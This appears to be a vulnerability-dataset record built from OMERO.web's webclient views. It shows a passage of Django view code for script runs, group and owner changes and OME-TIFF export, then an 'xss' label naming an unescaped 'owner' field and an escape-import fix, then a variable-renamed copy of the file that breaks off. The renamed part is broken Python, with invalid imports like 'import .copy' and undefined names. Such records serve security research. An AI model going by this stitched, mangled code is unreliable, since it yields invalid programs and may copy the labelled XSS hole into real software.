        # Lookup Tags & Datasets (for row labels)
        imgDict = []  # A list of data about each image.
        for iId in imageIds:
            data = {"id": iId}
            img = validImages[iId]
            data["name"] = img.getName()
            tags = [
                ann.getTextValue()
                for ann in img.listAnnotations()
                if ann._obj.__class__ == omero.model.TagAnnotationI
            ]
            data["tags"] = tags
            data["datasets"] = [d.getName() for d in img.listParents()]
            imgDict.append(data)
        # Use the first image as a reference
        image = validImages[imageIds[0]]
        context["imgDict"] = imgDict
        context["image"] = image
        context["channels"] = image.getChannels()
    elif scriptName == "Thumbnail":
        scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
        template = "webclient/scripts/thumbnail_figure.html"
        def loadImageTags(imageIds):
            """Return per-image tag lists and the collected tag objects."""
            tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
            linkMap = {}  # group tags. {imageId: [tags]}
            tagMap = {}
            for iId in imageIds:
                linkMap[iId] = []
            for link in tagLinks:
                c = link.getChild()
                if c._obj.__class__ == omero.model.TagAnnotationI:
                    tagMap[c.id] = c
                    linkMap[link.getParent().id].append(c)
            imageTags = []
            for iId in imageIds:
                imageTags.append({"id": iId, "tags": linkMap[iId]})
            tags = []
            for tId, t in tagMap.items():
                tags.append(t)
            return imageTags, tags
        thumbSets = []  # multiple collections of images
        tags = []
        figureName = "Thumbnail_Figure"
        if datasetIds is not None:
            # one thumbnail set per dataset
            for d in conn.getObjects("Dataset", datasetIds):
                imgIds = [i.id for i in d.listChildren()]
                imageTags, ts = loadImageTags(imgIds)
                thumbSets.append({"name": d.getName(), "imageTags": imageTags})
                tags.extend(ts)
            figureName = thumbSets[0]["name"]
        else:
            imageTags, ts = loadImageTags(imageIds)
            thumbSets.append({"name": "images", "imageTags": imageTags})
            tags.extend(ts)
            parent = conn.getObject("Image", imageIds[0]).getParent()
            figureName = parent.getName() or "Thumbnail Figure"
            context["parent_id"] = parent.getId()
        uniqueTagIds = set()  # remove duplicates
        uniqueTags = []
        for t in tags:
            if t.id not in uniqueTagIds:
                uniqueTags.append(t)
                uniqueTagIds.add(t.id)
        uniqueTags.sort(key=lambda x: x.getTextValue().lower())
        context["thumbSets"] = thumbSets
        context["tags"] = uniqueTags
        context["figureName"] = figureName.replace(" ", "_")
    elif scriptName == "MakeMovie":
        scriptPath = "/omero/export_scripts/Make_Movie.py"
        template = "webclient/scripts/make_movie.html"
        # expect to run on a single image at a time
        image = conn.getObject("Image", imageIds[0])
        # remove extension (if 3 chars or less)
        movieName = image.getName().rsplit(".", 1)
        if len(movieName) > 1 and len(movieName[1]) > 3:
            movieName = ".".join(movieName)
        else:
            movieName = movieName[0]
        # make sure name is not a path
        context["movieName"] = os.path.basename(movieName)
        chs = []
        for c in image.getChannels():
            chs.append(
                {
                    "active": c.isActive(),
                    "color": c.getColor().getHtml(),
                    "label": c.getLabel(),
                }
            )
        context["channels"] = chs
        context["sizeT"] = image.getSizeT()
        context["sizeZ"] = image.getSizeZ()
    scriptService = conn.getScriptService()
    scriptId = scriptService.getScriptID(scriptPath)
    if scriptId < 0:
        raise AttributeError("No script found for path '%s'" % scriptPath)
    context["template"] = template
    context["scriptId"] = scriptId
    return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
    """
    Check whether Images / Datasets etc contain partial Multi-image filesets.
    Used by chgrp or delete dialogs to test whether we can perform this
    'action'.
    """
    # Collect the selected object IDs from the query string, per type
    selected_ids = {}
    for obj_type in ("Image", "Dataset", "Project"):
        raw = request.GET.get(obj_type, None)
        if raw is not None:
            selected_ids[obj_type] = [int(oid) for oid in raw.split(",")]
    # Server reports filesets that the selection would split:
    # {filesetId: {True: [included imageIds], False: [excluded imageIds]}}
    split_filesets = conn.getContainerService().getImagesBySplitFilesets(
        selected_ids, None, conn.SERVICE_OPTS
    )
    split_info = [
        {
            "id": fileset_id,
            "attempted_iids": by_state[True],
            "blocking_iids": by_state[False],
        }
        for fileset_id, by_state in split_filesets.items()
    ]
    return {
        "split_filesets": split_info,
        # the chgrp dialog talks about 'move' rather than 'chgrp'
        "action": "move" if action == "chgrp" else action,
        "template": "webclient/activities/fileset_check_dialog_content.html",
    }
def getAllObjects(
    conn, project_ids, dataset_ids, image_ids, screen_ids, plate_ids, experimenter_id
):
    """
    Given a list of containers and images, calculate all the descendants
    and necessary siblings (for any filesets)

    Returns a dict with two keys:
      "remove":    ids (by type) of projects/datasets/screens/plates/images
                   that the operation takes away
      "childless": ids of datasets/projects (plus an "orphaned" flag) that
                   are left with no children and so need a client refresh

    NOTE(review): experimenter_id is not referenced in this function body.
    """
    # TODO Handle None inputs, maybe add defaults
    params = omero.sys.ParametersI()
    qs = conn.getQueryService()
    project_ids = set(project_ids)
    dataset_ids = set(dataset_ids)
    image_ids = set(image_ids)
    fileset_ids = set([])
    plate_ids = set(plate_ids)
    screen_ids = set(screen_ids)
    # Get any datasets for projects
    if project_ids:
        params.map = {}
        params.map["pids"] = rlist([rlong(x) for x in list(project_ids)])
        q = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            dataset_ids.add(e[0].val)
    # Get any plates for screens
    if screen_ids:
        params.map = {}
        params.map["sids"] = rlist([rlong(x) for x in screen_ids])
        q = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            plate_ids.add(e[0].val)
    # Get any images for datasets
    if dataset_ids:
        params.map = {}
        params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
        q = """
            select dilink.child.id,
                   dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
            # Some images in Dataset may not have fileset
            if e[1] is not None:
                fileset_ids.add(e[1].val)
    # Get any images for plates
    # TODO Seemed no need to add the filesets for plates as it isn't possible
    # to link it from outside of its plate. This may be true for the client,
    # but it certainly isn't true for the model so maybe allow this to also get
    # filesets
    if plate_ids:
        params.map = {}
        params.map["plids"] = rlist([rlong(x) for x in plate_ids])
        q = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
    # Get any extra images due to filesets
    # (images sharing a fileset with a selected image must move together)
    if fileset_ids:
        params.map = {}
        params.map["fsids"] = rlist([rlong(x) for x in fileset_ids])
        q = """
            select image.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.fileset.id in (select fs.id
                                       from Image im
                                       join im.fileset fs
                                       where fs.id in (:fsids)
                                       group by fs.id
                                       having count(im.id)>1)
            """
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            image_ids.add(e[0].val)
    # Get any additional datasets that may need updating as their children have
    # been snatched.
    # TODO Need to differentiate which orphaned directories need refreshing
    extra_dataset_ids = set([])
    extra_orphaned = False
    if image_ids:
        params.map = {
            "iids": rlist([rlong(x) for x in image_ids]),
        }
        exclude_datasets = ""
        if dataset_ids:
            params.map["dids"] = rlist([rlong(x) for x in dataset_ids])
            # Make sure to allow parentless results as well as those
            # that do not match a dataset being removed
            exclude_datasets = """
                               and (
                                   dilink.parent.id not in (:dids)
                                   or dilink.parent.id = null
                               )
                               """
        q = (
            """
            select distinct dilink.parent.id
            from Image image
            left outer join image.datasetLinks dilink
            where image.id in (:iids)
            %s
            and (select count(dilink2.child.id)
                 from DatasetImageLink dilink2
                 where dilink2.parent.id = dilink.parent.id
                 and dilink2.child.id not in (:iids)) = 0
            """
            % exclude_datasets
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            if e:
                extra_dataset_ids.add(e[0].val)
            else:
                extra_orphaned = True
    # Get any additional projects that may need updating as their children have
    # been snatched. There is no need to check for orphans because if a dataset
    # is being removed from somewhere else, it can not exist as an orphan.
    extra_project_ids = set([])
    if dataset_ids:
        params.map = {"dids": rlist([rlong(x) for x in dataset_ids])}
        exclude_projects = ""
        if project_ids:
            params.map["pids"] = rlist([rlong(x) for x in project_ids])
            exclude_projects = "and pdlink.parent.id not in (:pids)"
        q = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
                 from ProjectDatasetLink pdlink2
                 where pdlink2.parent.id = pdlink.parent.id
                 and pdlink2.child.id not in (:dids)) = 0
            """
            % exclude_projects
        )
        for e in qs.projection(q, params, conn.SERVICE_OPTS):
            extra_project_ids.add(e[0].val)
    # We now have the complete list of objects that will change group
    # We also have an additional list of datasets/projects that may have had
    # snatched children and thus may need updating in the client if the
    # dataset/project has gone from N to 0 children
    result = {
        # These objects are completely removed
        "remove": {
            "project": list(project_ids),
            "dataset": list(dataset_ids),
            "screen": list(screen_ids),
            "plate": list(plate_ids),
            "image": list(image_ids),
        },
        # These objects now have no children
        "childless": {
            "project": list(extra_project_ids),
            "dataset": list(extra_dataset_ids),
            "orphaned": extra_orphaned,
        },
    }
    return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
    """Submit a 'chgrp' dry-run; thin wrapper delegating to dryRun()."""
    return dryRun(request, action="chgrp", conn=conn, **kwargs)
@require_POST
@login_required()
def dryRun(request, action, conn=None, **kwargs):
    """Submit chgrp or chown dry-run

    POST parameters name object types ("Project", "Dataset", "Image",
    "Screen", "Plate", "Fileset") with comma-separated ID lists, plus
    the target "group_id" (chgrp) or "owner_id" (chown).
    Returns the dry-run job handle as a plain-text HttpResponse.
    """
    targetObjects = {}
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
    for dtype in dtypes:
        oids = request.POST.get(dtype, None)
        if oids is not None:
            targetObjects[dtype] = [int(oid) for oid in oids.split(",")]
    # Each action reads its target from a different POST parameter.
    # Previously an unknown action raised UnboundLocalError (500);
    # fail with an explicit 400 instead.
    target_params = {"chgrp": "group_id", "chown": "owner_id"}
    if action not in target_params:
        return JsonResponse(
            {"Error": "dryRun: Unknown action '%s'" % action}, status=400
        )
    target_id = getIntOrDefault(request, target_params[action], None)
    handle = conn.submitDryRun(action, targetObjects, target_id)
    jobId = str(handle)
    return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
    """
    Moves data to a new group, using the chgrp queue.
    Handles submission of chgrp form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']

    POST parameters: 'group_id' (target group); optionally
    'new_container_name'/'new_container_type' or 'target_id' to say where
    moved objects should be linked; object types ('Project', 'Dataset',
    'Image', 'Screen', 'Plate') with comma-separated IDs; and optional
    'fileset' IDs so multi-image filesets move together.
    Returns JSON {'update': ...} listing objects the client should refresh.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    # Get the target group_id
    group_id = getIntOrDefault(request, "group_id", None)
    if group_id is None:
        return JsonResponse({"Error": "chgrp: No group_id specified"})
    group_id = long(group_id)
    def getObjectOwnerId(r):
        # owner of the first Dataset/Image/Plate found in the POST data
        for t in ["Dataset", "Image", "Plate"]:
            ids = r.POST.get(t, None)
            if ids is not None:
                for o in list(conn.getObjects(t, ids.split(","))):
                    return o.getDetails().owner.id.val
    group = conn.getObject("ExperimenterGroup", group_id)
    new_container_name = request.POST.get("new_container_name", None)
    new_container_type = request.POST.get("new_container_type", None)
    container_id = None
    # Context must be set to owner of data, E.g. to create links.
    ownerId = getObjectOwnerId(request)
    conn.SERVICE_OPTS.setOmeroUser(ownerId)
    if (
        new_container_name is not None
        and len(new_container_name) > 0
        and new_container_type is not None
    ):
        conn.SERVICE_OPTS.setOmeroGroup(group_id)
        container_id = conn.createContainer(new_container_type, new_container_name)
    # No new container, check if target is specified
    if container_id is None:
        # E.g. "dataset-234"
        target_id = request.POST.get("target_id", None)
        container_id = target_id is not None and target_id.split("-")[1] or None
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            # TODO Doesn't the filesets only apply to images?
            # if 'filesets' are specified, make sure we move ALL Fileset Images
            fsIds = request.POST.getlist("fileset")
            if len(fsIds) > 0:
                # If a dataset is being moved and there is a split fileset
                # then those images need to go somewhere in the new
                if dtype == "Dataset":
                    conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
                else:
                    for fs in conn.getObjects("Fileset", fsIds):
                        obj_ids.extend([i.id for i in fs.copyImages()])
                    obj_ids = list(set(obj_ids))  # remove duplicates
            logger.debug("chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
            handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
            jobId = str(handle)
            # register the job so it appears in the Activities panel
            request.session["callback"][jobId] = {
                "job_type": "chgrp",
                "group": group.getName(),
                "to_group_id": group_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            request.session.modified = True
    # Update contains a list of images/containers that need to be
    # updated.
    project_ids = request.POST.get("Project", [])
    dataset_ids = request.POST.get("Dataset", [])
    image_ids = request.POST.get("Image", [])
    screen_ids = request.POST.get("Screen", [])
    plate_ids = request.POST.get("Plate", [])
    if project_ids:
        project_ids = [long(x) for x in project_ids.split(",")]
    if dataset_ids:
        dataset_ids = [long(x) for x in dataset_ids.split(",")]
    if image_ids:
        image_ids = [long(x) for x in image_ids.split(",")]
    if screen_ids:
        screen_ids = [long(x) for x in screen_ids.split(",")]
    if plate_ids:
        plate_ids = [long(x) for x in plate_ids.split(",")]
    # TODO Change this user_id to be an experimenter_id in the request as it
    # is possible that a user is chgrping data from another user so it is
    # that users orphaned that will need updating. Or maybe all orphaned
    # directories could potentially need updating?
    # Create a list of objects that have been changed by this operation. This
    # can be used by the client to visually update.
    update = getAllObjects(
        conn,
        project_ids,
        dataset_ids,
        image_ids,
        screen_ids,
        plate_ids,
        request.session.get("user_id"),
    )
    # return HttpResponse("OK")
    return JsonResponse({"update": update})
@login_required()
def chown(request, conn=None, **kwargs):
    """
    Moves data to a new owner, using the chown queue.
    Handles submission of chown form: all data in POST.
    Adds the callback handle to the request.session['callback']['jobId']

    POST parameters: 'owner_id' (target Experimenter) plus object types
    ('Project', 'Dataset', 'Image', 'Screen', 'Plate') with
    comma-separated ID lists. Returns JSON {'jobIds': [...]}.
    """
    if not request.method == "POST":
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)
    # Get the target owner_id
    owner_id = getIntOrDefault(request, "owner_id", None)
    if owner_id is None:
        return JsonResponse({"Error": "chown: No owner_id specified"})
    owner_id = int(owner_id)
    exp = conn.getObject("Experimenter", owner_id)
    if exp is None:
        # NB: previously the format string had no placeholder, so the '%'
        # raised TypeError instead of returning this error response
        return JsonResponse({"Error": "chown: Experimenter %s not found" % owner_id})
    dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
    jobIds = []
    for dtype in dtypes:
        # Get all requested objects of this type
        oids = request.POST.get(dtype, None)
        if oids is not None:
            obj_ids = [int(oid) for oid in oids.split(",")]
            logger.debug("chown to owner:%s %s-%s" % (owner_id, dtype, obj_ids))
            handle = conn.chownObjects(dtype, obj_ids, owner_id)
            jobId = str(handle)
            jobIds.append(jobId)
            # register the job so it appears in the Activities panel
            request.session["callback"][jobId] = {
                "job_type": "chown",
                "owner": exp.getFullName(),
                "to_owner_id": owner_id,
                "dtype": dtype,
                "obj_ids": obj_ids,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            request.session.modified = True
    return JsonResponse({"jobIds": jobIds})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
    """
    Runs a script using values in a POST

    Builds the script's inputMap from request.POST, converting values to
    the rtypes declared by the script's params, then delegates to
    run_script(). Returns a JsonResponse with the job status.
    """
    scriptService = conn.getScriptService()
    inputMap = {}
    sId = long(scriptId)
    try:
        params = scriptService.getParams(sId)
    except Exception as x:
        # 'message' attr is py2-only; fall back to args on python 3
        # (previously x.message raised AttributeError on py3)
        message = getattr(x, "message", None)
        if message is None:
            message = str(x.args[0]) if x.args else ""
        if message and message.startswith("No processor available"):
            # Delegate to run_script() for handling 'No processor available'
            rsp = run_script(request, conn, sId, inputMap, scriptName="Script")
            return JsonResponse(rsp)
        else:
            raise
    # NB: a redundant second getParams() call was removed here
    scriptName = params.name.replace("_", " ").replace(".py", "")
    logger.debug("Script: run with request.POST: %s" % request.POST)
    # upload new file annotation, if one was submitted with the form
    fileupload = (
        "file_annotation" in request.FILES and request.FILES["file_annotation"] or None
    )
    fileAnnId = None
    if fileupload is not None and fileupload != "":
        manager = BaseContainer(conn)
        fileAnnId = manager.createFileAnnotations(fileupload, [])
    for key, param in params.inputs.items():
        prototype = param.prototype
        pclass = prototype.__class__
        if key == "File_Annotation" and fileAnnId is not None:
            inputMap[key] = pclass(str(fileAnnId))
            continue
        # handle bool separately, since unchecked checkbox will not be in
        # request.POST
        if pclass == omero.rtypes.RBoolI:
            value = key in request.POST
            inputMap[key] = pclass(value)
            continue
        if pclass.__name__ == "RMapI":
            # map rows are posted as <key>_key0/<key>_value0, <key>_key1...
            keyName = "%s_key0" % key
            valueName = "%s_value0" % key
            row = 0
            paramMap = {}
            while keyName in request.POST:
                # the key and value don't have any data-type defined by
                # scripts - just use string
                k = str(request.POST[keyName])
                v = request.POST[valueName]
                if len(k) > 0 and len(v) > 0:
                    paramMap[str(k)] = v
                row += 1
                keyName = "%s_key%d" % (key, row)
                valueName = "%s_value%d" % (key, row)
            if len(paramMap) > 0:
                inputMap[key] = wrap(paramMap)
            continue
        if key in request.POST:
            if pclass == omero.rtypes.RListI:
                values = request.POST.getlist(key)
                if len(values) == 0:
                    continue
                if len(values) == 1:  # process comma-separated list
                    if len(values[0]) == 0:
                        continue
                    values = values[0].split(",")
                # try to determine 'type' of values in our list
                listClass = omero.rtypes.RStringI
                pval = prototype.val  # list
                # check if a value type has been set (first item of prototype
                # list)
                if len(pval) > 0:
                    listClass = pval[0].__class__
                    if listClass == int(1).__class__:
                        listClass = omero.rtypes.rint
                    if listClass == long(1).__class__:
                        listClass = omero.rtypes.rlong
                # construct our list, using appropriate 'type'
                valueList = []
                for v in values:
                    try:
                        # RStringI() will encode any unicode
                        obj = listClass(v.strip())
                    except Exception:
                        logger.debug("Invalid entry for '%s' : %s" % (key, v))
                        continue
                    if isinstance(obj, omero.model.IObject):
                        valueList.append(omero.rtypes.robject(obj))
                    else:
                        valueList.append(obj)
                inputMap[key] = omero.rtypes.rlist(valueList)
            # Handle other rtypes: String, Long, Int etc.
            else:
                value = request.POST[key]
                if len(value) == 0:
                    continue
                try:
                    inputMap[key] = pclass(value)
                except Exception:
                    logger.debug("Invalid entry for '%s' : %s" % (key, value))
                    continue
    # If we have objects specified via 'IDs' and 'DataType', try to pick
    # correct group
    if "IDs" in inputMap and "Data_Type" in inputMap:
        gid = conn.SERVICE_OPTS.getOmeroGroup()
        conn.SERVICE_OPTS.setOmeroGroup("-1")
        try:
            firstObj = conn.getObject(
                inputMap["Data_Type"].val, unwrap(inputMap["IDs"])[0]
            )
            newGid = firstObj.getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(newGid)
        except Exception:
            logger.debug(traceback.format_exc())
            # if inputMap values not as expected or firstObj is None
            conn.SERVICE_OPTS.setOmeroGroup(gid)
    try:
        # Try/except in case inputs are not serializable, e.g. unicode
        logger.debug("Running script %s with " "params %s" % (scriptName, inputMap))
    except Exception:
        pass
    rsp = run_script(request, conn, sId, inputMap, scriptName)
    return JsonResponse(rsp)
@login_required(isAdmin=True)
@render_response()
def script_upload(request, conn=None, **kwargs):
    """Script upload UI: render the form on GET; upload/replace on POST."""
    if request.method != "POST":
        return {"template": "webclient/scripts/upload_script.html"}
    # Build the full script path from the directory + uploaded file name
    path = request.POST.get("script_path")
    uploaded = request.FILES["script_file"]
    uploaded.seek(0)
    text = uploaded.read().decode("utf-8")
    if not path.endswith("/"):
        path += "/"
    path += uploaded.name
    # If script exists, replace. Otherwise upload as a new official script
    svc = conn.getScriptService()
    sid = svc.getScriptID(path)
    try:
        if sid > 0:
            svc.editScript(OriginalFileI(sid, False), text)
            msg = "Script Replaced: %s" % uploaded.name
        else:
            sid = svc.uploadOfficialScript(path, text)
            msg = "Script Uploaded: %s" % uploaded.name
    except omero.ValidationException as ex:
        msg = str(ex)
    return {"Message": msg, "script_id": sid}
@require_POST
@login_required()
def ome_tiff_script(request, imageId, conn=None, **kwargs):
    """
    Uses the scripting service (Batch Image Export script) to generate
    OME-TIFF for an image and attach this as a file annotation to the image.
    Script will show up in the 'Activities' for users to monitor and download
    result etc.
    """
    svc = conn.getScriptService()
    script_id = svc.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
    image = conn.getObject("Image", imageId)
    if image is not None:
        # run in the image's own group so the annotation attaches there
        conn.SERVICE_OPTS.setOmeroGroup(image.getDetails().group.id.val)
    target_ids = [long(imageId)]
    script_inputs = {
        "Data_Type": wrap("Image"),
        "IDs": rlist([rlong(i) for i in target_ids]),
        "Format": wrap("OME-TIFF"),
    }
    result = run_script(
        request, conn, script_id, script_inputs, scriptName="Create OME-TIFF"
    )
    return JsonResponse(result)
def run_script(request, conn, sId, inputMap, scriptName="Script"):
    """
    Starts running a script, adding details to the request.session so that it
    shows up in the webclient Activities panel and results are available there
    etc.

    Returns {"jobId": ..., "status": ...} on success, or
    {"status": ..., "error": ...} when submission fails.
    """
    request.session.modified = True
    scriptService = conn.getScriptService()
    try:
        handle = scriptService.runScript(sId, inputMap, None, conn.SERVICE_OPTS)
        # E.g. ProcessCallback/4ab13b23-22c9-4b5f-9318-40f9a1acc4e9 -t:tcp ... (proxy string identifies the job)  # noqa
        jobId = str(handle)
        status = "in progress"
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
        }
        request.session.modified = True
    except Exception as x:
        jobId = str(time())  # E.g. 1312803670.6076391
        # handle python 2 or 3 errors ('message' attr is py2-only)
        message = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
        if message and message.startswith("No processor available"):
            # omero.ResourceError
            logger.info(traceback.format_exc())
            error = "No Processor Available"
            status = "no processor available"
            message = ""  # template displays message and link
        else:
            # Don't log user mistake as ERROR
            if isinstance(x, omero.ValidationException):
                logger.debug(message)
            else:
                logger.error(traceback.format_exc())
            error = traceback.format_exc()
            status = "failed"
            # keep the py2/py3-safe message computed above (previously this
            # re-read x.message, which raises AttributeError on python 3)
        # save the error to http session, for display in 'Activities' window
        request.session["callback"][jobId] = {
            "job_type": "script",
            "job_name": scriptName,
            "start_time": datetime.datetime.now(),
            "status": status,
            "Message": message,
            "error": error,
        }
        return {"status": status, "error": error}
    return {"jobId": jobId, "status": status}
@login_required()
@render_response()
def ome_tiff_info(request, imageId, conn=None, **kwargs):
    """
    Query to see if we have an OME-TIFF attached to the image (assume only 1,
    since Batch Image Export will delete old ones)
    """
    # Any existing OME-TIFF will appear in list
    tiff_links = list(
        conn.getAnnotationLinks(
            "Image", [imageId], ns=omero.constants.namespaces.NSOMETIFF
        )
    )
    if not tiff_links:
        return {}  # will get returned as json by default
    # use highest ID === most recent
    newest = max(tiff_links, key=lambda link: link.getId())
    created = newest.creationEventDate()
    annId = newest.getChild().getId()
    from omeroweb.webgateway.templatetags.common_filters import ago

    return {
        "created": str(created),
        "ago": ago(created),
        "id": annId,
        "download": reverse("download_annotation", args=[annId]),
    }
| xss | {
"code": [
" \"owner\": r[\"owner\"],"
],
"line_no": [
1796
]
} | {
"code": [
"from django.utils.html import escape"
],
"line_no": [
38
]
} |
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.http import .is_safe_url
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
import .long
except ImportError:
VAR_241 = int
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
    """Read GET parameter VAR_3 as an integer (via VAR_241), using VAR_4 as
    the default. Returns None when the (possibly defaulted) value is None."""
    VAR_raw = VAR_2.GET.get(VAR_3, VAR_4)
    if VAR_raw is None:
        return None
    return VAR_241(VAR_raw)
def FUNC_1(VAR_2, VAR_3):
    """Return every non-empty value of the repeated GET parameter VAR_3."""
    return [item for item in VAR_2.GET.getlist(VAR_3) if item != ""]
def FUNC_2(VAR_2, VAR_3):
    """Deprecated shim: delegate to omeroweb.webgateway.util.get_longs()."""
    warnings.warn(
        "Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
    )
    return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
    # Read GET parameter VAR_3 and coerce it to a boolean, defaulting to VAR_4.
    return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
def FUNC_4(VAR_5):
    """Validate a redirect target to prevent open redirects (CWE-601).

    Any URL whose host is not in settings.REDIRECT_ALLOWED_HOSTS is replaced
    by the webclient index URL.
    """
    if not is_safe_url(VAR_5, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
        VAR_5 = VAR_352("webindex")  # VAR_352 appears to be Django reverse() — confirm
    return VAR_5
@never_cache
@render_response()
def FUNC_5(VAR_2, VAR_6=None, **VAR_7):
    """Render the webclient index page, honouring a custom INDEX_TEMPLATE."""
    VAR_53 = {"version": omero_version, "build_year": build_year}
    if settings.INDEX_TEMPLATE is not None:
        try:
            # Verify the configured template actually loads before using it.
            template_loader.get_template(settings.INDEX_TEMPLATE)
            VAR_53["template"] = settings.INDEX_TEMPLATE
        except Exception:
            # Fall back to the default template and surface the error message.
            VAR_53["template"] = "webclient/VAR_93.html"
            VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
    else:
        VAR_53["template"] = "webclient/VAR_93.html"
    return VAR_53
class CLASS_0(LoginView):
    """Webclient login view: renders the login page and, on success, cleans
    stale session state and redirects to a validated URL."""

    VAR_54 = "webclient/login.html"  # login page template path
    VAR_55 = "OMERO.web"

    def FUNC_81(self, VAR_2):
        # GET just shows the login form.
        return self.handle_not_logged_in(VAR_2)

    def FUNC_82(self, VAR_2, VAR_6, VAR_56):
        """Post-login hook: drop stale session keys, then redirect to the
        (validated) ?url=... target or the configured default."""
        # Forget the remembered active group if it is no longer valid.
        if VAR_2.session.get("active_group"):
            if (
                VAR_2.session.get("active_group")
                not in VAR_6.getEventContext().memberOfGroups
            ):
                del VAR_2.session["active_group"]
        if VAR_2.session.get("user_id"):
            del VAR_2.session["user_id"]
        if VAR_2.session.get("server_settings"):
            del VAR_2.session["server_settings"]
        if VAR_2.POST.get("noredirect"):
            return HttpResponse("OK")
        VAR_5 = VAR_2.GET.get("url")
        if VAR_5 is None or len(VAR_5) == 0:
            try:
                VAR_5 = parse_url(settings.LOGIN_REDIRECT)
            except Exception:
                VAR_5 = VAR_352("webindex")
        else:
            # Guard against open redirects: only whitelisted hosts allowed.
            VAR_5 = FUNC_4(VAR_5)
        return HttpResponseRedirect(VAR_5)

    def FUNC_83(self, VAR_2, VAR_57=None, VAR_22=None):
        """Render the login page with an optional error (VAR_57) / form."""
        if VAR_22 is None:
